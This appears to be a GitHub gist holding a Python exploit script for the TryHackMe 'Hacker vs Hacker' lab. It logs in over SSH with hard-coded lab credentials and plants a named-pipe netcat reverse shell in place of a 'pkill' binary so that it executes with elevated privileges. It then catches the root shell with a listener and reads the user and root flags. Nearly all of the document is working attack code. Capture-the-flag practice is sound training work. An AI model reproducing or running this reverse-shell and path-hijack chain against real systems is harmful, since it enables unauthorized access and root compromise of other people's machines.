Last active
August 25, 2022 08:27
TryHackMe Hacker vs Hacker exploit script
import requests | |
import sys | |
import subprocess | |
import paramiko | |
import os | |
import time | |
from pwn import * | |
#import socket | |
#from termcolor import colored | |
#import netifaces as ni | |
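def my():
    """Record the local callback address and port as attributes on ``my``.

    Sets ``my.ip`` to whatever IPv4 address the shell pipeline extracts from
    the ``tun0`` interface (an empty string if the pipeline prints nothing)
    and ``my.port`` to 4442. ``stable()`` and ``shell()`` read these
    attributes, so this must run before either of them.
    """
    # Raw string: the grep pattern contains \s, \d and \. which are invalid
    # escape sequences in an ordinary Python literal (SyntaxWarning on
    # current interpreters). The text handed to the shell is unchanged.
    my.ip = os.popen(
        r"ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'"
    ).read().strip()
    my.port = 4442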
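def stable(ip, user, passwd):
    """Log in over SSH, plant the callback script, print user.txt, call shell().

    Args:
        ip: Address of the SSH server to connect to.
        user: SSH username.
        passwd: SSH password.

    Errors raised while connecting or issuing the remote command propagate to
    the caller. Errors raised while reading the command output or inside
    ``shell()`` are printed and swallowed. The SSH client is closed on every
    path.
    """
    ssh = paramiko.SSHClient()
    # NOTE(review): AutoAddPolicy accepts whatever host key the server
    # presents, so the password is sent to an endpoint whose identity was
    # never verified.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, username=user, password=passwd)
        print('[*] Stabalizing Shell')
        # Named-pipe shell that connects back to my.ip:my.port.
        payload = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {my.ip} {my.port} >/tmp/f'
        # Overwrites ./bin/pkill (relative to the session's working directory)
        # with the payload and marks it executable, then prints user.txt.
        # What later runs that file, and with which privileges, is not shown
        # in this script - presumably something on the target resolves
        # `pkill` through a search path that includes this directory.
        # For defenders, both artefacts are observable on the host: a FIFO at
        # /tmp/f wired to `sh -i` and `nc`, and a file named after a system
        # utility appearing in a user-writable bin directory.
        command = f'echo "{payload}" > ./bin/pkill && chmod +x ./bin/pkill && cat user.txt'
        # The original guarded the next steps with `if (stdin, stdout, stderr):`,
        # a non-empty tuple that is always true; the check is dropped.
        _stdin, stdout, _stderr = ssh.exec_command(command)
        try:
            uflag = stdout.read().decode('ascii').strip("\n")
            print('[*]Gettign User flag')
            print('\n', "\033[48;5;236m\033[38;5;231mUser \033[38;5;208mFlag: \033[0;0m", uflag)
            print('\n[*]Getting root flag')
            shell()
        except Exception as e:
            print(e)
    finally:
        # The original never closed the client, leaking the transport and
        # its socket until interpreter exit.
        ssh.close()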
def shell():
    """Listen on ``my.port`` with netcat, send ``cat root.txt``, print the reply.

    Relies on ``my()`` having set ``my.port`` and on ``process`` from the
    file's ``from pwn import *``. Whatever arrives on the second ``recv`` is
    printed as the root flag without further checking.
    """
    listen_cmd = ['nc', '-nvlp', str(my.port)]
    with process(listen_cmd) as listener:
        # First chunk of listener output is read and discarded.
        listener.recv(1024)
        listener.sendline(b'cat root.txt')
        root_flag = listener.recv().decode()
        print('\n', "\033[48;5;236m\033[38;5;231mRoot \033[38;5;208mFlag: \033[0;0m", root_flag)
        # listener.interactive()
        # uncomment the previous line for spawning root shell
        listener.close()
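if __name__ == '__main__':
    # The target address is the only command-line argument; without this
    # guard a missing argument surfaced as an IndexError traceback.
    if len(sys.argv) < 2:
        print(f'usage: {sys.argv[0]} <target-ip>', file=sys.stderr)
        sys.exit(2)
    target = sys.argv[1]
    my()
    print(f'[*] Starting exploit on {target} \n')
    # NOTE(review): the account name and password are hard-coded, so the
    # script only applies to the lab room named in the gist title.
    stable(target, 'lachlan', 'thisistheway123')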